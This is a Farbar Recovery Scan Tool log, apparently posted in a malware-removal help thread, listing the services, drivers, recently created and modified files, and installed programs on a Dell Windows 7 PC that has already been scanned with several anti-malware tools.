R2 DcomLaunch; C:\Windows\system32\rpcss.dll [524288 2014-06-03] (Microsoft Corporation) [File not signed]
S3 EhttpSrv; C:\Program Files\ESET\ESET NOD32 Antivirus\EHttpSrv.exe [42360 2010-08-12] (ESET)
R2 ekrn; C:\Program Files\ESET\ESET NOD32 Antivirus\x86\ekrn.exe [810144 2010-08-12] (ESET)
R2 EmbassyService; C:\Program Files\Dell\Dell Data Protection\Access\Advanced\Wave\EMBASSY Client Core\EmbassyServer.exe [225720 2012-11-20] ()
R2 L4301_Solar; C:\Program Files\Logitech\SolarApp\L4301_Solar.exe [405744 2013-01-30] (Logitech, Inc.)
R2 LkCitadelServer; C:\Windows\SysWOW64\lkcitdl.exe [695136 2010-10-27] (National Instruments, Inc.)
R2 lkClassAds; C:\Windows\SysWOW64\lkads.exe [50328 2012-11-28] (National Instruments Corporation)
R2 lkTimeSync; C:\Windows\SysWOW64\lktsrv.exe [60568 2012-11-28] (National Instruments Corporation)
R2 msoidsvc; C:\Program Files\Common Files\Microsoft Shared\Microsoft Online Services\MSOIDSVC.EXE [2060192 2011-04-28] (Microsoft Corp.)
R2 mxssvr; C:\Program Files (x86)\National Instruments\MAX\nimxs.exe [51360 2012-11-21] (National Instruments Corporation)
S3 MyWiFiDHCPDNS; C:\Program Files\Intel\WiFi\bin\PanDhcpDns.exe [272688 2012-08-23] ()
R2 Net Driver HPZ12; C:\Windows\system32\HPZinw12.dll [71680 2010-01-18] (Hewlett-Packard) [File not signed]
R2 NIApplicationWebServer; C:\Program Files (x86)\National Instruments\Shared\NI WebServer\ApplicationWebServer.exe [54472 2012-11-30] (National Instruments Corporation)
S4 NIApplicationWebServer64; C:\Program Files\National Instruments\Shared\NI WebServer\ApplicationWebServer.exe [76488 2012-11-30] (National Instruments Corporation)
R2 NIDomainService; C:\Program Files (x86)\National Instruments\Shared\Security\nidmsrv.exe [371352 2012-11-28] (National Instruments Corporation)
S3 NILM License Manager; C:\Program Files (x86)\National Instruments\Shared\License Manager\Bin\lmgrd.exe [1427688 2010-08-02] (Macrovision Corporation)
R2 nimDNSResponder; C:\Program Files (x86)\National Instruments\Shared\mDNS Responder\nimdnsResponder.exe [258776 2012-09-26] (National Instruments Corporation)
R2 NINetworkDiscovery; C:\Program Files (x86)\National Instruments\Shared\NI Network Discovery\niDiscSvc.exe [172344 2012-12-18] (National Instruments Corporation)
R2 niSvcLoc; C:\Program Files (x86)\National Instruments\Shared\NI WebServer\SystemWebServer.exe [54464 2012-11-30] (National Instruments Corporation)
R2 NITaggerService; C:\Program Files (x86)\National Instruments\Shared\Tagger\tagsrv.exe [680624 2012-06-07] (National Instruments Corporation)
R2 O2FLASH; C:\Windows\system32\o2flash.exe [244328 2011-11-16] (O2Micro International)
R2 PbaDrvSvc_x64; C:\Program Files\Dell\Dell Data Protection\Access\Advanced\hapi64\pbadrvsvc.exe [20480 2012-11-23] () [File not signed]
R2 Pml Driver HPZ12; C:\Windows\system32\HPZipm12.dll [89600 2010-01-18] (Hewlett-Packard) [File not signed]
R2 RpcSs; C:\Windows\system32\rpcss.dll [524288 2014-06-03] (Microsoft Corporation) [File not signed]
S2 tcsd_win32.exe; C:\Program Files (x86)\Security Innovation\SI TSS\bin\tcsd_win32.exe [1643520 2012-05-11] () [File not signed]
R2 Wave Authentication Manager Service; C:\Program Files\Dell\Dell Data Protection\Access\Advanced\Wave\Authentication Manager\WaveAMService.exe [1758720 2012-11-19] (Wave Systems Corp.) [File not signed]
S2 WvPCR; C:\Program Files\Dell\Dell Data Protection\Access\Advanced\Wave\Common\WvPCR.exe [254384 2012-11-08] (Wave Systems Corp.)
R2 ZeroConfigService; C:\Program Files\Intel\WiFi\bin\ZeroConfigService.exe [3342640 2012-08-23] (Intel® Corporation)

==================== Drivers (Whitelisted) ====================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

R3 dcdbas; C:\Windows\System32\DRIVERS\dcdbas64.sys [39016 2012-09-23] (Dell Inc.)
R2 DgiVecp; C:\Windows\system32\Drivers\DgiVecp.sys [53816 2010-01-21] (Samsung Electronics Co., Ltd.)
R2 eamonm; C:\Windows\System32\DRIVERS\eamonm.sys [168544 2010-07-29] (ESET)
R1 ehdrv; C:\Windows\System32\DRIVERS\ehdrv.sys [141264 2010-07-29] (ESET)
R2 epfwwfpr; C:\Windows\System32\DRIVERS\epfwwfpr.sys [126320 2010-07-29] (ESET)
R1 nvkflt; C:\Windows\System32\DRIVERS\nvkflt.sys [300320 2013-12-04] (NVIDIA Corporation)
R3 ST_ACCEL; C:\Windows\System32\DRIVERS\ST_ACCEL.sys [68208 2012-05-21] (STMicroelectronics)
R3 usb3Hub; C:\Windows\System32\DRIVERS\usb3Hub.sys [47072 2012-10-09] (Windows ® Win 7 DDK provider)
S3 wbfcvusbdrv; C:\Windows\System32\Drivers\wbfcvusbdrv.sys [16008 2012-10-24] ()
R3 XHCIPort; C:\Windows\System32\DRIVERS\XHCIPort.sys [188896 2012-10-09] (Windows ® Win 7 DDK provider)
S3 KAPFA; \??\C:\Windows\system32\drivers\KAPFA.SYS [X]

==================== NetSvcs (Whitelisted) ===================

(If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.)

==================== One Month Created Files and Folders ========

(If an entry is included in the fixlist, the file\folder will be moved.)

2014-11-04 10:01 - 2014-11-04 10:01 - 00024053 _____ () C:\Users\rbecker\Desktop\FRST.txt
2014-11-04 09:54 - 2014-11-04 09:59 - 02114560 _____ (Farbar) C:\Users\rbecker\Desktop\FRST64.exe
2014-11-04 09:29 - 2014-11-04 09:29 - 00004035 _____ () C:\Users\bcostello\Desktop\RKreport_SCN_11042014_092846.log
2014-11-04 09:23 - 2014-11-04 09:25 - 00037624 _____ () C:\Windows\system32\Drivers\TrueSight.sys
2014-11-04 09:23 - 2014-11-04 09:23 - 17526360 _____ () C:\Users\bcostello\Desktop\RogueKillerX64.exe
2014-11-04 09:23 - 2014-11-04 09:23 - 00000000 ____D () C:\ProgramData\RogueKiller
2014-11-04 09:20 - 2014-11-04 09:20 - 00001471 _____ () C:\Users\bcostello\Desktop\mbamreport.txt
2014-11-04 09:10 - 2014-11-04 09:10 - 00001104 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2014-11-04 09:09 - 2014-11-04 09:09 - 19828376 _____ (Malwarebytes Corporation ) C:\Users\bcostello\Downloads\mbam-setup-2.0.3.1025.exe
2014-11-03 16:44 - 2014-11-03 16:44 - 00046148 _____ () C:\Users\bcostello\Desktop\Addition.txt
2014-11-03 16:44 - 2014-11-03 16:44 - 00036389 _____ () C:\Users\bcostello\Desktop\FRST.txt
2014-11-03 16:42 - 2014-11-03 16:42 - 02114560 _____ (Farbar) C:\Users\bcostello\Downloads\FRST64(1).exe
2014-11-03 16:41 - 2014-11-03 16:41 - 02114560 _____ (Farbar) C:\Users\bcostello\Desktop\FRST64.exe
2014-11-03 16:41 - 2014-11-03 16:41 - 00000000 ____D () C:\Users\bcostello\AppData\Local\Macromedia
2014-11-03 15:54 - 2014-11-03 15:54 - 02347384 _____ (ESET) C:\Users\bcostello\Downloads\esetsmartinstaller_enu(1).exe
2014-11-03 15:35 - 2014-11-03 15:35 - 02347384 _____ (ESET) C:\Users\bcostello\Downloads\esetsmartinstaller_enu.exe
2014-11-03 15:35 - 2014-11-03 15:35 - 00000000 ____D () C:\Program Files (x86)\ESET
2014-11-03 15:13 - 2014-11-04 09:09 - 00003056 _____ () C:\Windows\System32\Tasks\Defrag
2014-11-03 15:13 - 2014-11-04 09:09 - 00000232 _____ () C:\Windows\Tasks\Defrag.job
2014-11-03 14:49 - 2014-11-03 14:49 - 00030010 _____ () C:\ComboFix.txt
2014-11-03 14:41 - 2014-11-03 14:50 - 00000000 ____D () C:\ComboFix
2014-11-03 14:41 - 2011-06-26 01:45 - 00256000 _____ () C:\Windows\PEV.exe
2014-11-03 14:41 - 2010-11-07 12:20 - 00208896 _____ () C:\Windows\MBR.exe
2014-11-03 14:41 - 2009-04-19 23:56 - 00060416 _____ (NirSoft) C:\Windows\NIRCMD.exe
2014-11-03 14:41 - 2000-08-30 19:00 - 00518144 _____ (SteelWerX) C:\Windows\SWREG.exe
2014-11-03 14:41 - 2000-08-30 19:00 - 00406528 _____ (SteelWerX) C:\Windows\SWSC.exe
2014-11-03 14:41 - 2000-08-30 19:00 - 00098816 _____ () C:\Windows\sed.exe
2014-11-03 14:41 - 2000-08-30 19:00 - 00080412 _____ () C:\Windows\grep.exe
2014-11-03 14:41 - 2000-08-30 19:00 - 00068096 _____ () C:\Windows\zip.exe
2014-11-03 14:40 - 2014-11-03 14:50 - 00000000 ____D () C:\Qoobox
2014-11-03 14:40 - 2014-11-03 14:48 - 00000000 ____D () C:\Windows\erdnt
2014-11-03 14:25 - 2014-11-03 14:25 - 00000000 ____D () C:\Users\bcostello\AppData\Roaming\Macromedia
2014-11-03 14:12 - 2014-11-03 14:12 - 00000000 ____D () C:\Users\bcostello\AppData\Roaming\WinRAR
2014-11-03 14:00 - 2014-11-03 14:48 - 00000000 ____D () C:\Windows\SysWOW64\NV
2014-11-03 14:00 - 2014-11-03 14:48 - 00000000 ____D () C:\Windows\system32\NV
2014-10-31 12:22 - 2014-11-04 09:45 - 00129752 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2014-10-31 12:22 - 2014-11-04 09:10 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2014-10-31 12:22 - 2014-11-04 09:10 - 00000000 ____D () C:\Program Files (x86)\Malwarebytes Anti-Malware
2014-10-31 12:22 - 2014-10-31 12:22 - 00000000 ____D () C:\ProgramData\Malwarebytes
2014-10-31 12:22 - 2014-10-01 11:11 - 00093400 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbamchameleon.sys
2014-10-31 12:22 - 2014-10-01 11:11 - 00063704 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mwac.sys
2014-10-31 12:22 - 2014-10-01 11:11 - 00025816 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbam.sys
2014-10-31 12:21 - 2014-10-31 12:21 - 19828376 _____ (Malwarebytes Corporation ) C:\Users\rbecker\Downloads\mbam-setup-2.0.3.1025.exe
2014-10-31 09:13 - 2014-10-31 09:13 - 00001161 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk
2014-10-31 09:13 - 2014-10-31 09:13 - 00000000 ____D () C:\ProgramData\Mozilla
2014-10-31 09:13 - 2014-10-31 09:13 - 00000000 ____D () C:\Program Files (x86)\Mozilla Maintenance Service
2014-10-31 09:12 - 2014-10-31 09:12 - 00244032 _____ () C:\Users\rbecker\Downloads\Firefox Setup Stub 33.0.2.exe
2014-10-31 09:09 - 2014-10-31 09:13 - 00000000 ____D () C:\Users\rbecker\AppData\Local\Mozilla
2014-10-31 09:09 - 2014-10-31 09:09 - 00000000 ____D () C:\Users\rbecker\AppData\Roaming\Mozilla
2014-10-31 09:09 - 2014-10-31 09:09 - 00000000 ____D () C:\Users\rbecker\AppData\Local\Macromedia
2014-10-22 07:49 - 2014-10-22 07:49 - 00002345 _____ () C:\Users\rbecker\Desktop\OneNote 2013.lnk
2014-10-22 07:48 - 2014-10-22 07:48 - 00002403 _____ () C:\Users\rbecker\Desktop\Word 2013.lnk
2014-10-22 07:48 - 2014-10-22 07:48 - 00002402 _____ () C:\Users\rbecker\Desktop\PowerPoint 2013.lnk
2014-10-22 07:48 - 2014-10-22 07:48 - 00002366 _____ () C:\Users\rbecker\Desktop\Access 2013.lnk
2014-10-22 07:46 - 2014-10-22 07:46 - 00002365 _____ () C:\Users\rbecker\Desktop\Excel 2013.lnk
2014-10-22 07:46 - 2014-10-22 07:46 - 00002359 _____ () C:\Users\rbecker\Desktop\Outlook 2013.lnk
2014-10-22 07:36 - 2014-10-22 07:36 - 00000000 ____D () C:\Users\rbecker\AppData\Local\VirtualStore
2014-10-21 13:26 - 2014-10-21 13:26 - 00000000 ____D () C:\Users\rbecker\Documents\OneNote Notebooks
2014-10-21 11:43 - 2014-10-21 11:43 - 00000000 ____D () C:\Users\rbecker\AppData\Roaming\Macromedia
2014-10-21 11:11 - 2014-10-21 11:11 - 00000000 ____D () C:\Users\rbecker\AppData\Local\Apple
2014-10-21 11:09 - 2014-10-21 11:09 - 00000000 ___RD () C:\MSOCache
2014-10-21 11:03 - 2014-10-21 11:03 - 00000000 ____D () C:\Users\rbecker\AppData\Roaming\Apple Computer
2014-10-21 11:00 - 2014-10-21 12:35 - 00000000 ____D () C:\Users\rbecker\AppData\Roaming\Adobe
2014-10-21 11:00 - 2014-10-21 12:34 - 00000000 ____D () C:\Users\rbecker\AppData\Local\Adobe
2014-10-21 11:00 - 2014-10-21 11:00 - 00112248 _____ () C:\Users\rbecker\AppData\Local\GDIPFONTCACHEV1.DAT
2014-10-21 11:00 - 2014-10-21 11:00 - 00000000 ____D () C:\Users\rbecker\AppData\Roaming\Creative
2014-10-21 11:00 - 2014-10-21 11:00 - 00000000 ____D () C:\Users\rbecker\AppData\Local\National Instruments
2014-10-21 10:59 - 2014-10-21 10:59 - 00001411 _____ () C:\Users\rbecker\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer (64-bit).lnk
2014-10-21 10:58 - 2014-11-04 09:01 - 00003856 __RSH () C:\Users\rbecker\ntuser.pol
2014-10-21 10:58 - 2014-11-04 09:01 - 00000000 ____D () C:\Users\rbecker
2014-10-21 10:58 - 2014-10-21 10:59 - 00001445 _____ () C:\Users\rbecker\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk
2014-10-21 10:58 - 2014-10-21 10:58 - 00000020 ___SH () C:\Users\rbecker\ntuser.ini
2014-10-21 10:58 - 2014-10-21 10:58 - 00000000 ____D () C:\Users\rbecker\AppData\Roaming\Intel
2014-10-21 10:58 - 2013-03-14 10:42 - 00002102 _____ () C:\Users\rbecker\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Microsoft SkyDrive.lnk
2014-10-21 10:58 - 2009-07-13 23:54 - 00000000 ___RD () C:\Users\rbecker\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories
2014-10-21 10:58 - 2009-07-13 23:49 - 00000000 ___RD () C:\Users\rbecker\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance
2014-10-21 10:49 - 2014-11-03 15:35 - 00000000 ____D () C:\Users\bcostello\AppData\Local\Mozilla
2014-10-21 10:49 - 2014-10-21 10:49 - 00000000 ____D () C:\Users\bcostello\AppData\Roaming\Mozilla
2014-10-20 13:53 - 2014-10-20 13:53 - 00012872 _____ (SurfRight B.V.) C:\Windows\SysWOW64\bootdelete.exe
2014-10-20 13:53 - 2014-10-20 13:53 - 00000190 _____ () C:\Windows\SysWOW64\bootdelete.lst
2014-10-20 13:52 - 2014-10-31 09:06 - 00030616 _____ () C:\Windows\SysWOW64\Drivers\hitmanpro37.sys
2014-10-20 13:49 - 2014-10-20 13:49 - 00000000 ____D () C:\Program Files\HitmanPro
2014-10-20 13:46 - 2014-10-20 13:46 - 00000000 ____D () C:\Users\bcostello\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\WinRAR
2014-10-20 13:46 - 2014-10-20 13:46 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WinRAR
2014-10-20 13:46 - 2014-10-20 13:46 - 00000000 ____D () C:\Program Files\WinRAR
2014-10-20 13:33 - 2014-10-20 13:53 - 00000000 ____D () C:\ProgramData\HitmanPro
2014-10-17 15:11 - 2014-11-04 10:01 - 00000000 ____D () C:\FRST
2014-10-17 11:41 - 2014-11-03 14:25 - 00000000 ____D () C:\Users\bcostello\AppData\Roaming\Adobe
2014-10-17 11:41 - 2014-10-17 11:41 - 00000000 ____D () C:\Users\bcostello\AppData\Roaming\Creative
2014-10-17 11:41 - 2014-10-17 11:41 - 00000000 ____D () C:\Users\bcostello\AppData\Local\National Instruments
2014-10-17 11:41 - 2014-10-17 11:41 - 00000000 ____D () C:\Users\bcostello\AppData\Local\Adobe
2014-10-17 11:40 - 2014-10-17 11:40 - 00001411 _____ () C:\Users\bcostello\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer (64-bit).lnk
2014-10-17 11:39 - 2014-10-17 11:40 - 00001445 _____ () C:\Users\bcostello\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk
2014-10-17 11:39 - 2014-10-17 11:39 - 00002558 __RSH () C:\Users\bcostello\ntuser.pol
2014-10-17 11:39 - 2014-10-17 11:39 - 00000000 ____D () C:\Users\bcostello\AppData\Roaming\Intel
2014-10-17 11:39 - 2014-10-17 11:39 - 00000000 ____D () C:\Users\bcostello\AppData\Local\VirtualStore
2014-10-17 10:38 - 2014-10-17 10:38 - 00000000 ____D () C:\Users\bcostello\Documents\Audible
2014-10-17 10:36 - 2014-10-17 10:36 - 00000000 ____D () C:\Windows\pss

==================== One Month Modified Files and Folders =======

(If an entry is included in the fixlist, the file\folder will be moved.)

2014-11-04 10:00 - 2014-10-01 10:43 - 00005014 _____ () C:\Windows\System32\Tasks\WSCEAA
2014-11-04 09:43 - 2013-03-14 10:17 - 00000112 _____ () C:\Windows\system32\config\netlogon.ftl
2014-11-04 09:15 - 2009-07-13 23:45 - 00021312 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2014-11-04 09:15 - 2009-07-13 23:45 - 00021312 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2014-11-04 09:12 - 2013-02-20 15:12 - 00000830 _____ () C:\Windows\Tasks\Adobe Flash Player Updater.job
2014-11-04 09:12 - 2009-07-14 00:13 - 00785022 _____ () C:\Windows\system32\PerfStringBackup.INI
2014-11-04 09:09 - 2013-03-14 10:18 - 00017315 __RSH () C:\ProgramData\ntuser.pol
2014-11-04 09:08 - 2014-01-09 08:58 - 00041891 _____ () C:\Windows\setupact.log
2014-11-04 09:08 - 2009-07-14 00:08 - 00000006 ____H () C:\Windows\Tasks\SA.DAT
2014-11-04 09:07 - 2013-02-20 15:12 - 01748052 _____ () C:\Windows\WindowsUpdate.log
2014-11-04 09:02 - 2013-09-10 09:03 - 00004978 _____ () C:\Windows\System32\Tasks\Microsoft Office 15 Sync Maintenance for {3cb986d6-91c6-4e57-9f69-11185dadd832} ADC69.adc.com
2014-11-03 17:33 - 2013-09-12 09:26 - 00000072 _____ () C:\Users\Public\LMDebug.log
2014-11-03 15:10 - 2014-01-10 08:55 - 00449262 _____ () C:\Windows\PFRO.log
2014-11-03 14:50 - 2009-07-13 22:20 - 00000000 __RHD () C:\Users\Default
2014-11-03 14:48 - 2009-07-13 21:34 - 00000215 _____ () C:\Windows\system.ini
2014-11-03 14:47 - 2009-07-13 21:34 - 92012544 _____ () C:\Windows\system32\config\SOFTWARE.bak
2014-11-03 14:47 - 2009-07-13 21:34 - 19136512 _____ () C:\Windows\system32\config\SYSTEM.bak
2014-11-03 14:47 - 2009-07-13 21:34 - 01048576 _____ () C:\Windows\system32\config\DEFAULT.bak
2014-11-03 14:47 - 2009-07-13 21:34 - 00262144 _____ () C:\Windows\system32\config\SECURITY.bak
2014-11-03 13:51 - 2009-07-13 21:34 - 00262144 _____ () C:\Windows\system32\config\SAM.bak
2014-11-02 07:41 - 2013-10-23 16:10 - 00000000 ____D () C:\Program Files (x86)\Mozilla Firefox
2014-10-31 09:13 - 2013-10-23 16:10 - 00001149 _____ () C:\Users\Public\Desktop\Mozilla Firefox.lnk
2014-10-23 14:33 - 2009-07-13 22:20 - 00000000 __RHD () C:\Users\Public\Libraries
2014-10-22 07:36 - 2009-07-14 00:09 - 00000000 ____D () C:\Windows\System32\Tasks\WPD
2014-10-21 09:38 - 2013-03-14 10:40 - 00000000 ____D () C:\Program Files\Microsoft Office 15
2014-10-21 09:11 - 2009-07-13 22:20 - 00000000 ____D () C:\Windows\system32\NDF
2014-10-17 11:39 - 2014-08-14 08:05 - 00000000 ____D () C:\Users\bcostello
2014-10-15 10:35 - 2014-09-09 19:05 - 00000000 ____D () C:\FTC
2014-10-15 09:56 - 2013-04-09 14:09 - 00000020 ____H () C:\ProgramData\PKP_DLet.DAT
2014-10-06 07:57 - 2009-07-14 00:08 - 00032612 _____ () C:\Windows\Tasks\SCHEDLGU.TXT

Files to move or delete:
====================
C:\Users\kmitchell\CrmClientSetup.exe
C:\Users\kmitchell\msvcp100.dll
C:\Users\kmitchell\msvcr100.dll

Some content of TEMP:
====================
C:\Users\bcostello\AppData\Local\Temp\dllnt_dump.dll

==================== Bamital & volsnap Check =================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\System32\winlogon.exe => File is digitally signed
C:\Windows\System32\wininit.exe => File is digitally signed
C:\Windows\SysWOW64\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\System32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\System32\services.exe => File is digitally signed
C:\Windows\System32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\System32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\System32\rpcss.dll
[2010-11-20 22:24] - [2014-06-03 08:23] - 0524288 ____A (Microsoft Corporation) 6223F47AFA5D9C1ECB5AFD088BD19618

ATTENTION ======> If the system is having audio adware rpcss.dll is patched. Google the MD5, if the MD5 is unique the file is infected.
C:\Windows\System32\Drivers\volsnap.sys => File is digitally signed

LastRegBack: 2014-10-29 11:59

plaggard · November 4, 2014

Additional scan result of Farbar Recovery Scan Tool (x64) Version: 04-11-2014
Ran by bcostello at 2014-11-04 10:01:38
Running from C:\Users\rbecker\Desktop
Boot Mode: Normal
==========================================================

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: ESET NOD32 Antivirus 4.2 (Enabled - Up to date) {77DEAFED-8149-104B-25A1-21771CA47CD1}
AS: ESET NOD32 Antivirus 4.2 (Enabled - Up to date) {CCBF4E09-A773-1FC5-1F11-1A056723366C}
AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installed Programs ======================

(Only the adware programs with "hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

64 Bit HP CIO Components Installer (Version: 7.2.4 - Hewlett-Packard) Hidden
Adobe Acrobat X Standard - English, Français, Deutsch (HKLM-x32\...\{AC76BA86-1033-F400-BA7E-000000000005}) (Version: 10.1.7 - Adobe Systems)
Adobe Flash Player 15 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 15.0.0.167 - Adobe Systems Incorporated)
Adobe Flash Player 15 Plugin (HKLM-x32\...\Adobe Flash Player Plugin) (Version: 15.0.0.152 - Adobe Systems Incorporated)
Apple Application Support (HKLM-x32\...\{45C56AA7-ED1B-4800-A97F-EDDF3F3520B1}) (Version: 2.3.3 - Apple Inc.)
Apple Mobile Device Support (HKLM\...\{2F72F540-1F60-4266-9506-952B21D6640D}) (Version: 6.1.0.13 - Apple Inc.)
Apple Software Update (HKLM-x32\...\{789A5B64-9DD9-4BA5-915A-F0FC0A1B7BFE}) (Version: 2.1.3.127 - Apple Inc.)
Bonjour (HKLM\...\{6E3610B2-430D-4EB0-81E3-2B57E8B9DE8D}) (Version: 3.0.0.10 - Apple Inc.)
Custom (Version: 01.00.00.002 - Wave Systems Corp.) Hidden
D3DX10 (x32 Version: 15.4.2368.0902 - Microsoft) Hidden
Dell 1135n Laser MFP (HKLM-x32\...\Dell 1135n Laser MFP) (Version: - DELL Inc.)
Dell ControlVault Host Components Installer 64 bit (Version: 2.3.24.1437 - Broadcom Corporation) Hidden
Dell Data Protection | Access (HKLM\...\{ABBA2EA4-740E-4052-902B-9CA70B081E3F}) (Version: 2.3.00001.021 - Dell Inc.)
Dell Edoc Viewer (HKLM\...\{8EBA8727-ADC2-477B-9D9A-1A1836BE4E05}) (Version: 1.0.0 - Dell Inc)
Dell Touchpad (HKLM\...\{9F72EF8B-AEC9-4CA5-B483-143980AFD6FD}) (Version: 8.1200.101.116 - ALPS ELECTRIC CO., LTD.)
Dell Webcam Central (HKLM-x32\...\Dell Webcam Central) (Version: 1.40.54 - Creative Technology Ltd)
DellAccess (Version: 01.03.00.046 - Wave Systems Corp.) Hidden
Dexterity Shared Components 12.0 (64-bit) (HKLM\...\{E56D868E-684F-4586-AF90-9F46DAC569A2}) (Version: 12.00.0270.000 - Microsoft Corporation)
EMBASSY Client Core (Version: 01.03.00.092 - Wave Systems Corp.) Hidden
ERAS Connector (Version: 02.09.05.0330 - Wave Systems Corp) Hidden
ESET NOD32 Antivirus (HKLM\...\{C5F268F1-0856-43E2-B6F1-2470EEE48D2A}) (Version: 4.2.64.12 - ESET, spol. s r.o.)
ESET Online Scanner v3 (HKLM-x32\...\ESET Online Scanner) (Version: - )
Gemalto (Version: 01.64.01.0010 - Wave Systems Corp) Hidden
GemPcCCID (Version: 2.0.1 - Gemalto) Hidden
HitmanPro 3.7 (HKLM\...\HitmanPro37) (Version: 3.7.9.232 - SurfRight B.V.)
Intel® Control Center (HKLM-x32\...\{F8A9085D-4C7A-41a9-8A77-C8998A96C421}) (Version: 1.2.1.1008 - Intel Corporation)
Intel® Network Connections 16.8.45.00 (HKLM\...\PROSetDX) (Version: 16.8.45.00 - Dell)
Intel® Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 8.15.10.2639 - Intel Corporation)
Intel® USB 3.0 eXtensible Host Controller Driver (HKLM-x32\...\{240C3DDD-C5E9-4029-9DF7-95650D040CF2}) (Version: 1.0.6.245 - Intel Corporation)
Intel® WiDi (HKLM\...\{6097158B-0184-4140-BEC3-7885794D2571}) (Version: 3.5.40.0 - Intel Corporation)
Intel® Wireless Display (HKLM\...\{28EF7372-9087-4AC3-9B9F-D9751FCDF830}) (Version: - )
Intel® PROSet/Wireless WiFi Software (HKLM\...\{ECE5B218-A086-4E18-A362-D11181681457}) (Version: 15.03.1000.1637 - Intel Corporation)
iTunes (HKLM\...\{0225AD21-F3E2-4916-BFF3-65D3F9052582}) (Version: 11.0.2.26 - Apple Inc.)
Java 7 Update 55 (64-bit) (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F86417055FF}) (Version: 7.0.550 - Oracle)
Java 7 Update 55 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83217055FF}) (Version: 7.0.550 - Oracle)
Junk Mail filter update (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
LEGO MINDSTORMS NXT x64 Driver (HKLM\...\{36E6DCFB-9D16-4213-9985-8B68EFEA6019}) (Version: 1.20.140.0 - LEGO)
Logitech Solar App 1.10 (HKLM\...\SolarApp) (Version: 1.10.3 - Logitech)
Malwarebytes Anti-Malware version 2.0.3.1025 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.0.3.1025 - Malwarebytes Corporation)
Math Kernel Libraries (64-bit) (Version: 1.0.31.0 - National Instruments) Hidden
Math Kernel Libraries (x32 Version: 1.0.31.0 - National Instruments) Hidden
Mesh Runtime (x32 Version: 15.4.5722.2 - Microsoft Corporation) Hidden
Microsoft .NET Framework 4 Client Profile (HKLM\...\Microsoft .NET Framework 4 Client Profile) (Version: 4.0.30319 - Microsoft Corporation)
Microsoft .NET Framework 4 Extended (HKLM\...\Microsoft .NET Framework 4 Extended) (Version: 4.0.30319 - Microsoft Corporation)
Microsoft Camera Codec Pack (HKLM\...\{9DCA0803-0890-4631-94BA-17DE31C49C40}) (Version: 16.4.1734.1104 - Microsoft Corporation)
Microsoft Dynamics CRM 2011 for Microsoft Office Outlook (HKLM-x32\...\Microsoft CRM Client) (Version: 5.0.9690.1992 - Microsoft Corporation)
Microsoft Lync 2010 SDK Runtime (HKLM-x32\...\{8AF10E19-4330-4077-A1B5-491ACDC24B08}) (Version: 4.0.7577.125 - Microsoft Corporation)
Microsoft Lync Web App Plug-in (HKLM\...\{6619085B-A9D5-4DDD-800B-964903EAF546}) (Version: 15.8.8308.726 - Microsoft Corporation)
Microsoft Office Professional 2013 - en-us (HKLM\...\ProfessionalRetail - en-us) (Version: 15.0.4659.1001 - Microsoft Corporation)
Microsoft Online Services Sign-in Assistant (HKLM\...\{CF2EFAB4-B938-47C6-8426-0FB50D610E92}) (Version: 7.250.4259.0 - Microsoft Corporation)
Microsoft ReportViewer 2010 Redistributable (HKLM-x32\...\{C19B3EB6-B54C-3204-A4DF-88432E0C79F7}) (Version: 10.0.30319 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.10411.0 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft SQL Server 2008 Native Client (HKLM\...\{C79A7EAB-9D6F-4072-8A6D-F8F54957CD93}) (Version: 10.0.1600.22 - Microsoft Corporation)
Microsoft SQL Server Compact 3.5 SP2 ENU (HKLM-x32\...\{28DA3304-9EC2-4097-BC64-B59A1958841F}) (Version: 3.5.8082.0 - Microsoft Corporation)
